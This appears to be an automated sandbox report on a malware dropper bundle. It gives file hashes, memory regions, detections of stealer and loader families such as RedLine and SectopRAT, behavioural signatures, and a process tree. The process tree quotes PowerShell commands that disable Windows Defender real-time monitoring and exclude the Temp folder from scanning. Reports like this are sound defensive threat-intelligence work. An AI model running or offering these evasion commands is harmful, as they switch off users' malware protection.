| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2744-69-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/1556-191-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1468-190-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2528-192-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\is-CH67V.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-CH67V.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2856-204-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/2312-208-0x0000000000CB0000-0x0000000000D20000-memory.dmp
memory/1936-206-0x0000000001280000-0x00000000012F2000-memory.dmp
memory/1612-205-0x0000000000E30000-0x0000000000EA0000-memory.dmp
memory/2720-207-0x0000000000E70000-0x0000000000E88000-memory.dmp
memory/2720-210-0x0000000000430000-0x0000000000436000-memory.dmp
memory/2008-225-0x0000000002550000-0x0000000002740000-memory.dmp
memory/2744-226-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2744-231-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2744-230-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2744-229-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2744-228-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2744-227-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3056-244-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3056-242-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3056-241-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3056-240-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3056-238-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3056-236-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3056-234-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3056-232-0x0000000000400000-0x0000000000422000-memory.dmp
memory/496-269-0x0000000000400000-0x0000000000422000-memory.dmp
memory/496-268-0x0000000000400000-0x0000000000422000-memory.dmp
memory/496-267-0x0000000000400000-0x0000000000422000-memory.dmp
memory/496-266-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/496-264-0x0000000000400000-0x0000000000422000-memory.dmp
memory/496-262-0x0000000000400000-0x0000000000422000-memory.dmp
memory/496-260-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3068-257-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3068-255-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3068-254-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3068-253-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3068-251-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3068-249-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3068-247-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1744-283-0x0000000000400000-0x0000000002F29000-memory.dmp
memory/2744-291-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2744-290-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2744-285-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2744-284-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2744-292-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab6307.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:28
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
157s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3780 set thread context of 4536 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe |
| PID 1000 set thread context of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe |
| PID 3012 set thread context of 2708 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed096e68af113.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe
Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3516 -ip 3516
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe
Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe
Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe
Wed0911cd5800a45.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe
Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe
Wed09a6fb1d0dd846.exe
